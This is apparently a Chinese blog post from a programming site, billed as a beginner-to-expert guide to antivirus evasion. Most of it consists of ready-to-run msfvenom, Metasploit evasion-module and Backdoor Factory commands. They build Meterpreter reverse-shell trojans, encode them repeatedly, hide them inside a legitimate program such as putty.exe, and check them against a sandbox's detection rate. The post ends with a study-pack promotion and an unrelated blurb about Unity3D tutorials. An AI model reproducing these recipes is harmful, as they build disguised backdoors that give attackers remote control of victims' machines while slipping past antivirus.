2024最新最全【免杀技术】零基础入门到精通

攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18

1、自编码免杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe

开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用

微步沙箱检测结果,检出率近一半,效果一般

​​​

2、自捆绑免杀
    在生成payload时可以使用捆绑功能,使用msfvenom的 -x 参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,-x 后跟对应的文件路径即可。示例中已在当前文件夹下准备好了模板
msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -f exe -o shell2.exe

靶机运行木马成功反弹shell,木马可正常使用

微步检测结果,检出率近一半,效果一般

3、自捆绑+编码免杀
msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell3.exe

在靶机运行木马反弹shell成功

微步沙箱检测结果,免杀效果一般

4、多重编码+捆绑免杀
    msfvenom的encoder编码器可以对payload进行一定程度的免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同的编码器反复编码进行混淆。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.1.11 lport=4444 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e cmd/powershell_base64 -a x86 --platform windows -x putty.exe -f exe -o shell4.exe

靶机运行木马反弹shell成功,免杀效果一般(免杀方式可多种方式混合使用)

5、evasion免杀
   2019年1月,metasploit升级为5.0,引入了一个新模块叫evasion模块,官方称这个模块可以创建反杀毒软件的木马

模块:windows/windows_defender_exe、windows/windows_defender_js_hta

msf6 exploit(multi/handler) > use windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set filename shell5.exe
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.1.11
msf6 evasion(windows/windows_defender_exe) > set lport 4444
msf6 evasion(windows/windows_defender_exe) > run

靶机运行木马反弹shell成功,

6、backdoor factory
    backdoor-factory,又称后门工厂(BFD),BFD也是一款老牌的免杀神器,其作者曾经在2015年的blackhat大会上介绍过该工具,但是作者已经于2017年停止更新,免杀效果至今还算是不错。

检查宿主是否支持patch

python backdoor.py -f 程序路径 -S

-f:指定测试程序

-S:检查程序是否支持

查看宿主程序代码缝隙

python backdoor.py -f 程序路径 -c

-c:查看程序代码缝隙

获取该文件的可用payload

python backdoor.py -f 程序路径 -s show

-s:选择使用payload

指定payload、回连地址和端口、输出程序名、指定使用的代码缝隙

python backdoor.py -f 程序路径 -s 指定payload -J -H 回连地址 -P 回连端口 -o 输出程序名

-J:使用多代码缝隙注入

微步沙箱检测,免杀效果较好

生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 10 -f raw -o shellcode.c

注入shellcode

python backdoor.py -f 程序路径 -s 指定payload -U 指定shellcode -H 回连ip -P 回连端口 -o 输出程序名

:黑客&网络安全的SQL攻防

在这里领取:

在这里插入图片描述

这个是我花了几天几夜自整理的最新最全网安学习资料包免费共享给你们,其中包含以下东西:

1.学习路线&职业规划

在这里插入图片描述
在这里插入图片描述

2.全套体系课&入门到精通

在这里插入图片描述

3.黑客电子书&面试资料

在这里插入图片描述

  • 32
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
对于想要学习Unity3D的零基础入门者来说,有很多途径可以获取相关教程资源。其中,网盘是一个非常方便的选择。在网盘上可以找到大量的Unity3D教程资源,从入门精通的学习材料应有尽有。 首先,我们可以搜索各大教育平台或论坛中与Unity3D相关的网盘资源,如百度云盘、蓝奏云盘等。在这些网盘中,可以找到Unity3D官方教程、各类入门教程、视频教程以及示例项目等。这些资源从零基础入门到进阶深入,都提供了详实的学习内容和示例,帮助学习者逐步掌握Unity3D的基本操作和应用。 此外,还可以加入Unity3D学习交流社群,如Unity官方论坛、CSDN的Unity社区等,这些社群中的会员经常进行资源共享和教程推荐。在其中也可以找到一些Unity3D教程资源的网盘链接。另外,还有一些Unity3D培训机构或个人在网盘上分享了自己制作的教学视频或文档,这些资源可以帮助学习者更好地理解和掌握Unity3D的各种技术。 最后,建议学习者在下载网盘资源时,要注意资源的可靠性和合法性。选择来源可信的网盘资源,避免下载盗版或非法教程。此外,在学习过程中还需要充分利用官方文档、论坛资源以及在线的视频教程,多方面的学习和实践才能帮助零基础的学习者快速入门并逐步精通Unity3D。 总之,Unity3D的零基础入门精通的教程资源在网盘上是丰富多样的。学习者可以通过搜索各类教育平台或论坛中的资源分享,加入学习交流社群,获取大量的教程视频、文档和示例项目,从而逐步掌握Unity3D的技术和应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序员七海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值